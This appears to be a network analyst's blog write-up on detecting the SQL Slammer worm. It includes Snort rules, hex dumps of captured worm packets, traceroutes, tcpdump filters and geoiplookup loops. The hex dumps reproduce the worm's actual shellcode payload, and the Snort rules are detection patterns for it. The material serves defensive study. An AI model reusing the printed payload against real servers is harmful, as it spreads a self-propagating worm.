A Brief Anatomy of Malware detection and some notes on using traceroute and determining 'intent'

From the posts below we can begin to understand why signature identification is so important.  We are looking for malware in the packet data itself since any port can be used to send malware and any IP can be spoofed or unwittingly part of a botnet or worm.  The packets below are indicative of the "Win32:SQLSlammer"  worm attack that has been around for a considerable time. The worm propagates itself by generating random IP addresses. Notice that the first SIP (Source IP) address is either spoofed or "router leakage" : e.g. it comes from RFC1918 "private" (non-internet IPs) subnet: 10.255.255.255. Remember that any of these IP addresses can be either (a) spoofed or (b) botnet victims or (c) unpatched SQL servers so that their ultimate location may not neccessarily tells us anything about 'intent' or 'bad actors'. Note the common signature in these 376 byte packets. The "Win32:SQLSlammer" reeked an extraordinary amount of havoc upon the internet with a very small amount of assembly code. The current Snort rules for this worm look like this:

alert udp $EXTERNAL_NET any -> $HOME_NET 1434 (msg:"SQL Worm propagation attempt"; flow:to_server; content:"|04|"; depth:1; content:"|81 F1 03 01 04 9B 81 F1 01|"; content:"sock"; content:"send"; metadata:policy balanced-ips drop, policy security-ips drop; reference:bugtraq,5310; reference:bugtraq,5311; reference:cve,2002-0649; reference:nessus,11214; reference:url,vil.nai.com/vil/content/v_99992.htm; classtype:misc-attack; sid:2003; rev:12;)

alert udp $HOME_NET any -> $EXTERNAL_NET 1434 (msg:"SQL Worm propagation attempt OUTBOUND"; flow:to_server; content:"|04|"; depth:1; content:"|81 F1 03 01 04 9B 81 F1|"; content:"sock"; content:"send"; metadata:policy balanced-ips drop, policy security-ips drop; reference:bugtraq,5310; reference:bugtraq,5311; reference:cve,2002-0649; reference:nessus,11214; reference:url,vil.nai.com/vil/content/v_99992.htm; classtype:misc-attack; sid:2004; rev:11;)

The packets I captured are below. Note the common ASCII signature

05/11-14:33:07.744419 0:9:5B:0:F3:DA -> 0:60:97:30:6B:C4 type:0x800 len:0x1A2

10.13.3.61:1092 -> 192.168.0.12:1434 UDP TTL:113 TOS:0x20 ID:61068 IpLen:20 DgmLen:404

Len: 376

0x0000: 00 60 97 30 6B C4 00 09 5B 00 F3 DA 08 00 45 20  .`.0k...[.....E 

0x0010: 01 94 EE 8C 00 00 71 11 8B AE 0A 0D 03 3D C0 A8  ......q......=..

0x0020: 00 0C 04 44 05 9A 01 80 63 09 04 01 01 01 01 01  ...D....c.......

0x0030: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................

0x0040: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................

0x0050: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................

0x0060: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................

0x0070: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................

0x0080: 01 01 01 01 01 01 01 01 01 01 01 DC C9 B0 42 EB  ..............B.

0x0090: 0E 01 01 01 01 01 01 01 70 AE 42 01 70 AE 42 90  ........p.B.p.B.

0x00A0: 90 90 90 90 90 90 90 68 DC C9 B0 42 B8 01 01 01  .......h...B....

0x00B0: 01 31 C9 B1 18 50 E2 FD 35 01 01 01 05 50 89 E5  .1...P..5....P..

0x00C0: 51 68 2E 64 6C 6C 68 65 6C 33 32 68 6B 65 72 6E  

0x00D0: 51 68 6F 75 6E 74 68 69 63 6B 43 68 47 65 74 54  QhounthickChGetT

0x00E0: 66 B9 6C 6C 51 68 33 32 2E 64 68 77 73 32 5F 66  f.llQh32.dhws2_f

0x00F0: B9 65 74 51 68 73 6F 63 6B 66 B9 74 6F 51 68 73  .etQhsockf.toQhs

0x0100: 65 6E 64 BE 18 10 AE 42 8D 45 D4 50 FF 16 50 8D  end....B.E.P..P.

0x0110: 45 E0 50 8D 45 F0 50 FF 16 50 BE 10 10 AE 42 8B  E.P.E.P..P....B.

0x0120: 1E 8B 03 3D 55 8B EC 51 74 05 BE 1C 10 AE 42 FF  ...=U..Qt.....B.

0x0130: 16 FF D0 31 C9 51 51 50 81 F1 03 01 04 9B 81 F1  ...1.QQP........

0x0140: 01 01 01 01 51 8D 45 CC 50 8B 45 C0 50 FF 16 6A  ....Q.E.P.E.P..j

0x0150: 11 6A 02 6A 02 FF D0 50 8D 45 C4 50 8B 45 C0 50  .j.j...P.E.P.E.P

0x0160: FF 16 89 C6 09 DB 81 F3 3C 61 D9 FF 8B 45 B4 8D  ........

0x0170: 0C 40 8D 14 88 C1 E2 04 01 C2 C1 E2 08 29 C2 8D  .@...........)..

0x0180: 04 90 01 D8 89 45 B4 6A 10 8D 45 B0 50 31 C9 51  .....E.j..E.P1.Q

0x0190: 66 81 F1 78 01 51 8D 45 03 50 8B 45 AC 50 FF D6  f..x.Q.E.P.E.P..

0x01A0: EB CA                                            ..

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

05/11-14:53:48.630387 0:9:5B:0:F3:DA -> 0:60:97:30:6B:C4 type:0x800 len:0x1A2

202.99.11.99:1231 -> 192.168.0.12:1434 UDP TTL:110 TOS:0x80 ID:26925 IpLen:20 DgmLen:404

Len: 376

0x0000: 00 60 97 30 6B C4 00 09 5B 00 F3 DA 08 00 45 80  .`.0k...[.....E.

0x0010: 01 94 69 2D 00 00 6E 11 4B 31 CA 63 0B 63 C0 A8  ..i-..n.K1.c.c..

0x0020: 00 0C 04 CF 05 9A 01 80 9A 01 04 01 01 01 01 01  ................

0x0030: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................

0x0040: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................

0x0050: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................

0x0060: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................

0x0070: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................

0x0080: 01 01 01 01 01 01 01 01 01 01 01 DC C9 B0 42 EB  ..............B.

0x0090: 0E 01 01 01 01 01 01 01 70 AE 42 01 70 AE 42 90  ........p.B.p.B.

0x00A0: 90 90 90 90 90 90 90 68 DC C9 B0 42 B8 01 01 01  .......h...B....

0x00B0: 01 31 C9 B1 18 50 E2 FD 35 01 01 01 05 50 89 E5  .1...P..5....P..

0x00C0: 51 68 2E 64 6C 6C 68 65 6C 33 32 68 6B 65 72 6E  Qh.dllhel32hkern

0x00D0: 51 68 6F 75 6E 74 68 69 63 6B 43 68 47 65 74 54  QhounthickChGetT

0x00E0: 66 B9 6C 6C 51 68 33 32 2E 64 68 77 73 32 5F 66  f.llQh32.dhws2_f

0x00F0: B9 65 74 51 68 73 6F 63 6B 66 B9 74 6F 51 68 73  .etQhsockf.toQhs

0x0100: 65 6E 64 BE 18 10 AE 42 8D 45 D4 50 FF 16 50 8D  end....B.E.P..P.

0x0110: 45 E0 50 8D 45 F0 50 FF 16 50 BE 10 10 AE 42 8B  E.P.E.P..P....B.

0x0120: 1E 8B 03 3D 55 8B EC 51 74 05 BE 1C 10 AE 42 FF  ...=U..Qt.....B.

0x0130: 16 FF D0 31 C9 51 51 50 81 F1 03 01 04 9B 81 F1  ...1.QQP........

0x0140: 01 01 01 01 51 8D 45 CC 50 8B 45 C0 50 FF 16 6A  ....Q.E.P.E.P..j

0x0150: 11 6A 02 6A 02 FF D0 50 8D 45 C4 50 8B 45 C0 50  .j.j...P.E.P.E.P

0x0160: FF 16 89 C6 09 DB 81 F3 3C 61 D9 FF 8B 45 B4 8D  ........

0x0170: 0C 40 8D 14 88 C1 E2 04 01 C2 C1 E2 08 29 C2 8D  .@...........)..

0x0180: 04 90 01 D8 89 45 B4 6A 10 8D 45 B0 50 31 C9 51  .....E.j..E.P1.Q

0x0190: 66 81 F1 78 01 51 8D 45 03 50 8B 45 AC 50 FF D6  f..x.Q.E.P.E.P..

0x01A0: EB CA  

ñ05/11-19:12:48.180440 0:9:5B:0:F3:DA -> 0:60:97:30:6B:C4 type:0x800 len:0x1A2

58.20.222.30:1297 -> 192.168.0.12:1434 UDP TTL:114 TOS:0x20 ID:9759 IpLen:20 DgmLen:404

Len: 376

0x0000: 00 60 97 30 6B C4 00 09 5B 00 F3 DA 08 00 45 20  .`.0k...[.....E 

0x0010: 01 94 26 1F 00 00 72 11 48 33 3A 14 DE 1E C0 A8  ..&...r.H3:.....

0x0020: 00 0C 05 11 05 9A 01 80 57 53 04 01 01 01 01 01  ........WS......

0x0030: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................

0x0040: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................

0x0050: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................

0x0060: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................

0x0070: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................

0x0080: 01 01 01 01 01 01 01 01 01 01 01 DC C9 B0 42 EB  ..............B.

0x0090: 0E 01 01 01 01 01 01 01 70 AE 42 01 70 AE 42 90  ........p.B.p.B.

0x00A0: 90 90 90 90 90 90 90 68 DC C9 B0 42 B8 01 01 01  .......h...B....

0x00B0: 01 31 C9 B1 18 50 E2 FD 35 01 01 01 05 50 89 E5  .1...P..5....P..

0x00C0: 51 68 2E 64 6C 6C 68 65 6C 33 32 68 6B 65 72 6E  Qh.dllhel32hkern

0x00D0: 51 68 6F 75 6E 74 68 69 63 6B 43 68 47 65 74 54  QhounthickChGetT

0x00E0: 66 B9 6C 6C 51 68 33 32 2E 64 68 77 73 32 5F 66  f.llQh32.dhws2_f

0x00F0: B9 65 74 51 68 73 6F 63 6B 66 B9 74 6F 51 68 73  .etQhsockf.toQhs

0x0100: 65 6E 64 BE 18 10 AE 42 8D 45 D4 50 FF 16 50 8D  end....B.E.P..P.

0x0110: 45 E0 50 8D 45 F0 50 FF 16 50 BE 10 10 AE 42 8B  E.P.E.P..P....B.

0x0120: 1E 8B 03 3D 55 8B EC 51 74 05 BE 1C 10 AE 42 FF  ...=U..Qt.....B.

0x0130: 16 FF D0 31 C9 51 51 50 81 F1 03 01 04 9B 81 F1  ...1.QQP........

0x0140: 01 01 01 01 51 8D 45 CC 50 8B 45 C0 50 FF 16 6A  ....Q.E.P.E.P..j

0x0150: 11 6A 02 6A 02 FF D0 50 8D 45 C4 50 8B 45 C0 50  .j.j...P.E.P.E.P

0x0160: FF 16 89 C6 09 DB 81 F3 3C 61 D9 FF 8B 45 B4 8D  ........

0x0170: 0C 40 8D 14 88 C1 E2 04 01 C2 C1 E2 08 29 C2 8D  .@...........)..

0x0180: 04 90 01 D8 89 45 B4 6A 10 8D 45 B0 50 31 C9 51  .....E.j..E.P1.Q

0x0190: 66 81 F1 78 01 51 8D 45 03 50 8B 45 AC 50 FF D6  f..x.Q.E.P.E.P..

0x01A0: EB CA                                            ..

05/11-20:06:49.515800 0:9:5B:0:F3:DA -> 0:60:97:30:6B:C4 type:0x800 len:0x1A2

69.13.200.210:1269 -> 192.168.0.12:1434 UDP TTL:115 TOS:0x20 ID:42723 IpLen:20 DgmLen:404

Len: 376

0x0000: 00 60 97 30 6B C4 00 09 5B 00 F3 DA 08 00 45 20  .`.0k...[.....E 

0x0010: 01 94 A6 E3 00 00 73 11 D0 C1 45 0D C8 D2 C0 A8  ......s...E.....

0x0020: 00 0C 04 F5 05 9A 01 80 61 C2 04 01 01 01 01 01  ........a.......

0x0030: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................

0x0040: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................

0x0050: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................

0x0060: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................

0x0070: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................

0x0080: 01 01 01 01 01 01 01 01 01 01 01 DC C9 B0 42 EB  ..............B.

0x0090: 0E 01 01 01 01 01 01 01 70 AE 42 01 70 AE 42 90  ........p.B.p.B.

0x00A0: 90 90 90 90 90 90 90 68 DC C9 B0 42 B8 01 01 01  .......h...B....

0x00B0: 01 31 C9 B1 18 50 E2 FD 35 01 01 01 05 50 89 E5  .1...P..5....P..

0x00C0: 51 68 2E 64 6C 6C 68 65 6C 33 32 68 6B 65 72 6E  Qh.dllhel32hkern

0x00D0: 51 68 6F 75 6E 74 68 69 63 6B 43 68 47 65 74 54  QhounthickChGetT

0x00E0: 66 B9 6C 6C 51 68 33 32 2E 64 68 77 73 32 5F 66  f.llQh32.dhws2_f

0x00F0: B9 65 74 51 68 73 6F 63 6B 66 B9 74 6F 51 68 73  .etQhsockf.toQhs

0x0100: 65 6E 64 BE 18 10 AE 42 8D 45 D4 50 FF 16 50 8D  end....B.E.P..P.

0x0110: 45 E0 50 8D 45 F0 50 FF 16 50 BE 10 10 AE 42 8B  E.P.E.P..P....B.

0x0120: 1E 8B 03 3D 55 8B EC 51 74 05 BE 1C 10 AE 42 FF  ...=U..Qt.....B.

0x0130: 16 FF D0 31 C9 51 51 50 81 F1 03 01 04 9B 81 F1  ...1.QQP........

0x0140: 01 01 01 01 51 8D 45 CC 50 8B 45 C0 50 FF 16 6A  ....Q.E.P.E.P..j

0x0150: 11 6A 02 6A 02 FF D0 50 8D 45 C4 50 8B 45 C0 50  .j.j...P.E.P.E.P

0x0160: FF 16 89 C6 09 DB 81 F3 3C 61 D9 FF 8B 45 B4 8D  ........

0x0170: 0C 40 8D 14 88 C1 E2 04 01 C2 C1 E2 08 29 C2 8D  .@...........)..

0x0180: 04 90 01 D8 89 45 B4 6A 10 8D 45 B0 50 31 C9 51  .....E.j..E.P1.Q

0x0190: 66 81 F1 78 01 51 8D 45 03 50 8B 45 AC 50 FF D6  f..x.Q.E.P.E.P..

0x01A0: EB CA                                            ..

Notice that Snort gives us a full length reading of the packet by default. This verbosity helps enable robust signature creation and detection. (More on that later.) Since the Win32:SQLSlammer worm propagates itself by generating "random IP addresses", the trace routes below may simply lead back to more victims who have unpatched machines or who are botnet victims. Interestingly, several routers actually respond to my traceroute for the private IP address 10.13.3.61:

# traceroute 10.13.8.61

traceroute to 10.13.8.61 (10.13.8.61), 64 hops max, 40 byte packets

 1  192.168.0.1 (192.168.0.1)  0.405 ms  0.334 ms  0.286 ms

 2  * * *

 3  68.87.207.113 (68.87.207.113)  11.558 ms  11.113 ms  12.196 ms

 4  te-5-3-ur02.ferndale.wa.seattle.comcast.net (68.86.96.110)  10.639 ms  10.806 ms  15.992 ms

 5  te-0-9-0-7-ar01.seattle.wa.seattle.comcast.net (68.86.96.105)  13.841 ms  15.408 ms  15.311 ms

 6  * * *

 7  * * *

 8  * * *

 9  * * *

10  * * *

# traceroute 202.99.11.99

traceroute to 202.99.11.99 (202.99.11.99), 64 hops max, 40 byte packets

 1  192.168.0.1 (192.168.0.1)  0.496 ms  0.344 ms  0.376 ms

 2  * * *

 3  68.87.207.113 (68.87.207.113)  11.941 ms  11.272 ms  15.845 ms

 4  te-5-3-ur02.ferndale.wa.seattle.comcast.net (68.86.96.110)  24.681 ms  10.952 ms  11.595 ms

 5  te-0-9-0-7-ar01.seattle.wa.seattle.comcast.net (68.86.96.105)  14.363 ms  19.869 ms  14.247 ms

 6  pos-0-3-0-0-cr01.seattle.wa.ibone.comcast.net (68.86.90.209)  13.914 ms  14.518 ms  14.792 ms

 7  pos-0-8-0-0-cr01.portland.or.ibone.comcast.net (68.86.85.206)  19.672 ms  18.450 ms  19.496 ms

 8  pos-1-14-0-0-cr01.sacramento.ca.ibone.comcast.net (68.86.85.201)  32.156 ms  35.483 ms  31.574 ms

 9  pos-0-8-0-0-cr01.sanjose.ca.ibone.comcast.net (68.86.85.78)  33.493 ms  33.305 ms  34.754 ms

10  pos-0-0-0-0-pe01.11greatoaks.ca.ibone.comcast.net (68.86.86.50)  37.252 ms  37.343 ms  37.79 ms

11  75.149.229.42 (75.149.229.42)  36.697 ms  40.34 ms  36.615 ms

12  219.158.29.221 (219.158.29.221)  241.962 ms  242.456 ms  242.522 ms

13  219.158.5.133 (219.158.5.133)  242.769 ms  243.188 ms  242.885 ms

14  219.158.4.57 (219.158.4.57)  249.602 ms  249.813 ms  249.892 ms

15  202.96.12.30 (202.96.12.30)  261.865 ms  261.656 ms  261.901 ms

16  61.148.156.9 (61.148.156.9)  267.504 ms  266.695 ms  266.543 ms

17  61.148.156.166 (61.148.156.166)  267.896 ms  267.840 ms  272.820 ms

18  202.96.13.138 (202.96.13.138)  273.190 ms  272.447 ms  272.802 ms

19  211.154.209.162 (211.154.209.162)  234.590 ms  239.304 ms  234.552 ms

20  202.96.6.74 (202.96.6.74)  263.857 ms  265.102 ms  263.489 ms

21  Sh-Rtr-2-S3/0.sta.net.cn (202.96.6.130)  246.632 ms  255.336 ms  245.572 ms

22  * * *

traceroute to 58.20.222.30 (58.20.222.30), 64 hops max, 60 byte packets

 1  192.168.0.1 (192.168.0.1)  0.352 ms  0.337 ms  0.288 ms

 2  * * *

 3  68.87.207.113 (68.87.207.113)  8.935 ms  9.63 ms  9.107 ms

 4  te-5-3-ur02.ferndale.wa.seattle.comcast.net (68.86.96.110)  9.516 ms  9.785 ms  9.715 ms

 5  te-0-9-0-7-ar01.seattle.wa.seattle.comcast.net (68.86.96.105)  12.484 ms  12.145 ms  11.947 ms

 6  pos-0-5-0-0-cr01.seattle.wa.ibone.comcast.net (68.86.90.213)  14.90 ms  14.66 ms  12.611 ms

 7  pos-0-8-0-0-cr01.portland.or.ibone.comcast.net (68.86.85.206)  17.41 ms  16.51 ms  18.15 ms

 8  pos-1-15-0-0-cr01.sacramento.ca.ibone.comcast.net (68.86.85.197)  29.443 ms  30.459 ms  29.458 ms

 9  pos-0-8-0-0-cr01.sanjose.ca.ibone.comcast.net (68.86.85.78)  31.863 ms  31.426 ms  31.794 ms

10  pos-0-0-0-0-pe01.11greatoaks.ca.ibone.comcast.net (68.86.86.54)  35.808 ms  34.497 ms  35.363 ms

11  75.149.229.42 (75.149.229.42)  34.716 ms  64.27 ms  35.371 ms

12  219.158.29.213 (219.158.29.213)  247.202 ms  245.893 ms  247.260 ms

13  219.158.5.109 (219.158.5.109)  234.699 ms  234.229 ms  233.225 ms

14  219.158.9.102 (219.158.9.102)  239.58 ms  240.322 ms  240.992 ms

15  220.248.160.166 (220.248.160.166)  277.291 ms  275.978 ms  274.375 ms

16  58.20.222.30 (58.20.222.30)  245.299 ms  246.499 ms  245.847 ms

# traceroute -P ICMP 69.13.200.210                                     

traceroute to 69.13.200.210 (69.13.200.210), 64 hops max, 60 byte packets

 1  192.168.0.1 (192.168.0.1)  1.198 ms  1.158 ms  1.135 ms

 2  * * *

 3  68.87.207.113 (68.87.207.113)  8.636 ms  11.743 ms  8.967 ms

 4  te-5-3-ur02.ferndale.wa.seattle.comcast.net (68.86.96.110)  9.764 ms  8.822 ms  9.405 ms

 5  te-0-9-0-7-ar01.seattle.wa.seattle.comcast.net (68.86.96.105)  12.576 ms  12.828 ms  11.758 ms

 6  pos-0-5-0-0-cr01.seattle.wa.ibone.comcast.net (68.86.90.213)  13.794 ms  12.422 ms  13.459 ms

 7  pos-0-8-0-0-cr01.portland.or.ibone.comcast.net (68.86.85.206)  17.811 ms  16.782 ms  16.575 ms

 8  pos-1-14-0-0-cr01.sacramento.ca.ibone.comcast.net (68.86.85.201)  33.718 ms  28.898 ms  30.359 ms

 9  pos-0-9-0-0-cr01.sanjose.ca.ibone.comcast.net (68.86.85.181)  32.74 ms  32.334 ms  33.448 ms

10  er1-tengig3-4.sanjoseequinix.savvis.net (208.173.53.137)  35.790 ms  33.16 ms  32.538 ms

11  * cr1-tenge-0-3-5-0.sanfrancisco.savvis.net (204.70.200.198)  35.756 ms *

12  * * *

13  msr1-tengig0-0-0-0.dallas.savvis.net (204.70.196.202)  80.164 ms  81.798 ms  80.857 ms

14  er1-ge-3-0-6.dallas.savvis.net (204.70.202.61)  78.275 ms  75.309 ms  75.975 ms

15  federal-home-loan.Dallas.savvis.net (208.172.135.2)  76.970 ms  77.282 ms  77.882 ms

16  64.182.192.41 (64.182.192.41)  79.384 ms  79.456 ms  79.130 ms

17  210-200-13-69.cust.propagation.net (69.13.200.210)  76.181 ms  78.84 ms  77.538 ms

# geoiplookup 202.99.11.99 -f /usr/local/share/GeoIP/GeoLiteCity.dat

GeoIP City Edition, Rev 1: CN, 22, Beijing, (null), 39.928902, 116.388298, 0, 0

# geoiplookup 58.20.222.30 -f /usr/local/share/GeoIP/GeoLiteCity.dat 

GeoIP City Edition, Rev 1: CN, 11, Changsha, (null), 28.179199, 113.113602, 0, 0

# geoiplookup 69.13.200.210  -f /usr/local/share/GeoIP/GeoLiteCity.dat

GeoIP City Edition, Rev 1: US, TX, Fort Worth, 76112, 32.749199, -97.220497, 623, 817

# traceroute -P ICMP 69.13.200.210                                     

                                          ..

Where are the SIPs from? Part II

The following sequence of commands and output gives us some idea of what a network security analyst's life was like before the development of Intrusion Prevention Systems. After a laboriously contstructed tcpdump filter,we run this for 36 hours on our dummy/honeypot host. We then have a collections of SIPs sending packets to various ports. Some of these are easily identifiable well known attack ports (ms-sql, telnet, ssh,etc.)

/usr/local/sbin/tcpdump -s 0 -i xl0 -ttt -w out.txt  'port not(domain or whois or http or https or syslog or ntp or smtp or 137 or 139)' and 'not(broadcast or icmp or igmp or arp)' 

  

# tcpdump -r out.txt

tcpdump: WARNING: snaplen raised from 96 to 65535

21:07:30.303358 218.7.164.30.6000 > 192.168.0.12.ms-sql-s: S 69599232:69599232(0) win 16384 [tos 0x20]

21:30:08.976883 202.99.11.99.1231 > 192.168.0.12.ms-sql-m: udp 376 [tos 0x20]

22:20:11.329910 catv-86-101-50-119.catv.broadband.hu.1077 > 192.168.0.12.38507: udp 28 [tos 0x20]

23:01:48.360917 10.13.3.61.1092 > 192.168.0.12.ms-sql-m: udp 376 [tos 0x20]

23:40:09.452031 117.0.33.129.3285 > 192.168.0.12.telnet: S 543288824:543288824(0) win 5808 (DF) [tos 0x20]

00:36:06.236501 dynamic.91.192.169.55.vpcit.ru.1076 > 192.168.0.12.38507: udp 30 [tos 0x20]

00:46:25.553206 c-98-242-240-55.hsd1.fl.comcast.net.37443 > 192.168.0.12.ssh: S 3044387924:3044387924(0) win 5840 (DF) [tos 0x20]

01:17:34.032666 213.0.55.130.34982 > 192.168.0.12.38507: udp 31 [tos 0x20]

01:29:12.722357 94.123.212.150.13597 > 192.168.0.12.12712: udp 30 [tos 0x20]

02:17:27.658034 121.15.245.215.12200 > 192.168.0.12.3128: S 484387749:484387749(0) win 8192 (DF) [tos 0x20]

02:33:20.751286 118.222.228.38.4692 > 192.168.0.12.6429: S 1557396635:1557396635(0) win 65535 (DF) [tos 0x20]

02:33:21.387784 118.222.228.38.4692 > 192.168.0.12.6429: S 1557396635:1557396635(0) win 65535 (DF) [tos 0x20]

02:33:21.990932 118.222.228.38.4692 > 192.168.0.12.6429: S 1557396635:1557396635(0) win 65535 (DF) [tos 0x20]

02:58:36.094717 61.153.26.60.1517 > 192.168.0.12.ms-sql-m: udp 376 [tos 0x20]

03:12:16.084284 222.215.230.49.12200 > 192.168.0.12.8000: S 788992279:788992279(0) win 8192 (DF) [tos 0x20]

03:15:54.079656 222.215.230.49.12200 > 192.168.0.12.3128: S 796332311:796332311(0) win 8192 (DF) [tos 0x20]

03:19:51.292696 221.195.73.68.6000 > 192.168.0.12.7212: S 1454440448:1454440448(0) win 16384 [tos 0x20]

03:19:51.294608 221.195.73.68.6000 > 192.168.0.12.8000: S 798031872:798031872(0) win 16384 [tos 0x20]

04:36:18.268102 210.51.165.30.33386 > 192.168.0.12.ssh: S 1493736546:1493736546(0) win 5840 (DF) [tos 0x20]

05:38:50.224275 static-39-92-224-77.ipcom.comunitel.net.61031 > 192.168.0.12.12712: udp 94 [tos 0x20]

05:55:59.481908 75-165-69-40.tukw.qwest.net.4004 > 192.168.0.12.telnet: S 481811338:481811338(0) win 5840 (DF) [tos 0x20]

06:36:17.744371 128.55.237.114.broad.lyg.js.dynamic.163data.com.cn.62161 > 192.168.0.12.5900: S 3649363145:3649363145(0) win 65535 (DF) [tos 0x20]

06:36:18.500456 128.55.237.114.broad.lyg.js.dynamic.163data.com.cn.62161 > 192.168.0.12.5900: S 3649363145:3649363145(0) win 65535 (DF) [tos 0x20]

07:20:05.328165 8.63.191.61.broad.static.hf.ah.cndata.com.6000 > 192.168.0.12.2967: S 1176764416:1176764416(0) win 16384 [tos 0x20]

....

After some awkward awk statements, we have the SIP list ready for processing by geoiplookup LiteCity database:

tcpdump -r out.txt | awk -F">" '{print $1}' | awk -F" " '{print $2}' | awk -F"." '{print $1"."$2"."$3"."$4}' >> out_IP.txt 

for i in `cat out_IP.txt`; do echo $i : `geoiplookup $i -f /usr/local/share/GeoIP/GeoLiteCity.dat`; done 

218.7.164.30 : GeoIP City Edition, Rev 1: CN, 08, Suihua, (null), 46.640598, 126.996902, 0, 0

202.99.11.99 : GeoIP City Edition, Rev 1: CN, 22, Beijing, (null), 39.928902, 116.388298, 0, 0

catv-86-101-50-119.catv.broadband.hu : GeoIP City Edition, Rev 1: HU, 23, Veszprém, (null), 47.099998, 17.916700, 0, 0

192.168.0.5 : GeoIP City Edition, Rev 1: IP Address not found

192.168.0.5 : GeoIP City Edition, Rev 1: IP Address not found

10.13.3.61 : GeoIP City Edition, Rev 1: IP Address not found

117.0.33.129 : GeoIP City Edition, Rev 1: VN, 44, Hanoi, (null), 21.033300, 105.849998, 0, 0

dynamic.91.192.169 : GeoIP City Edition, Rev 1: can't resolve hostname ( dynamic.91.192.169 )

c-98-242-240-55.hsd1.fl.comcast : GeoIP City Edition, Rev 1: can't resolve hostname ( c-98-242-240-55.hsd1.fl.comcast )

....

But let us suppose we want to track only connections from the United States:

for i in `cat out_IP.txt`; do echo $i : `geoiplookup $i` | grep 'United States'; done   

75-165-69-40.tukw.qwest.net : GeoIP Country Edition: US, United States

128.55.237.114 : GeoIP Country Edition: US, United States

128.55.237.114 : GeoIP Country Edition: US, United States

8.63.191.61 : GeoIP Country Edition: US, United States

173.1.171.82 : GeoIP Country Edition: US, United States

12.4.209.243 : GeoIP Country Edition: US, United States

208-110-155-97.customer.csolutions.net : GeoIP Country Edition: US, United States

Traceroutes to particular IPs are notoriously useless:

# traceroute  8.63.191.61

traceroute to 8.63.191.61 (8.63.191.61), 64 hops max, 40 byte packets

 1  192.168.0.1 (192.168.0.1)  1.179 ms  1.153 ms  1.143 ms

 2  * * *

 3  68.87.207.113 (68.87.207.113)  11.692 ms  9.661 ms  9.477 ms

 4  te-5-3-ur02.ferndale.wa.seattle.comcast.net (68.86.96.110)  9.541 ms  11.897 ms  10.621 ms

 5  te-0-9-0-7-ar01.seattle.wa.seattle.comcast.net (68.86.96.105)  12.404 ms  13.245 ms  13.285 ms

 6  pos-0-3-0-0-cr01.seattle.wa.ibone.comcast.net (68.86.90.209)  13.652 ms  12.481 ms  13.850 ms

 7  te-3-2.car1.Seattle1.Level3.net (4.79.104.105)  15.77 ms  13.320 ms  13.734 ms

 8  * * *

 9  * * *

10  * * *

11  * * *

^C

# traceroute  -P ICMP 8.63.191.61

traceroute to 8.63.191.61 (8.63.191.61), 64 hops max, 60 byte packets

 1  192.168.0.1 (192.168.0.1)  0.460 ms  0.328 ms  0.289 ms

 2  * * *

 3  68.87.207.113 (68.87.207.113)  12.610 ms  8.716 ms  8.629 ms

 4  te-5-3-ur02.ferndale.wa.seattle.comcast.net (68.86.96.110)  9.434 ms  8.360 ms  13.671 ms

 5  te-0-9-0-7-ar01.seattle.wa.seattle.comcast.net (68.86.96.105)  12.748 ms  11.914 ms  11.173 ms

 6  pos-0-3-0-0-cr01.seattle.wa.ibone.comcast.net (68.86.90.209)  19.632 ms  13.667 ms  12.556 ms

 7  te-3-2.car1.Seattle1.Level3.net (4.79.104.105)  14.819 ms  13.441 ms  13.465 ms

 8  * * *

 9  * * *

10  * *

So now we have spent quite a bit of time extracting data for just one day's worth of activity. Obviously what is needed is a more comprehensive approach: real-time alerting, database, web-based information, long-term analysis and mapping.  This is what you buy with your Intrusion Prevention System...

Where are the SIPs from?

The geoiplookup utility is very helpful in assessing the country where the SIPs (Source Internet Protocol Address) are from. We might be able to say 'hackers' instead of SIPs, if it were ultimately possible to deduce from a SIP the originators of an attack on any given Firewall. And that is important to remember: IPs can be spoofed, the country of origin tells you nothing about the operator themselves, criminals and nation-states terrorists can be leased. So withhold judgement based on IP!!

However,if I log to a file a tcpdump something like this:

/usr/local/sbin/tcpdump -s 0 -i xl0 -n -tt 'port not(ssh or domain or whois or http or https or syslog or ntp or 137 or 139)' and 'not(broadcast or icmp or igmp or arp)' 

My dummy/honeypot host receives about 100 or so entries per day from foreign IPs that look like this:

1241804920.098123 IP 85.249.160.55.1225 > 192.168.0.12.38507: UDP, length 20

1241805774.527866 IP 201.67.52.249.59649 > 192.168.0.12.12712: UDP, length 21

1241806316.686063 IP 218.6.12.230.6000 > 192.168.0.12.2967: Flags [S], seq 114163712, win 16384, length 0

1241806357.627835 IP 61.153.26.60.1517 > 192.168.0.12.1434: UDP, length 376

1241807555.257870 IP 91.150.223.226.1519 > 192.168.0.12.38507: UDP, length 63

1241813077.431641 IP 98.247.212.4.1980 > 192.168.0.12.23: Flags [SEW], seq 1693462630, win 5840, options [mss 1460,sackOK,TS val 117815450 ecr 0,nop,wscale 0], length 0

...

The syslog entries that my Netgear FVS318 firewall is forwarding to my OpenBSD dummy/honeypot host contain similar attacks but many more legitimate connection attempts like this:

May  9 09:06:45 192.168.0.1 rferris Blocked Sites Log[46161]:portforward forwarded , SIP:216.35.67.135: 80, DIP:98.247.182.78: 19899, 

May  9 09:07:06 192.168.0.1 rferris Blocked Sites Log[46166]:portforward forwarded , SIP:68.87.69.146: 53, DIP:98.247.182.78: 17337, 

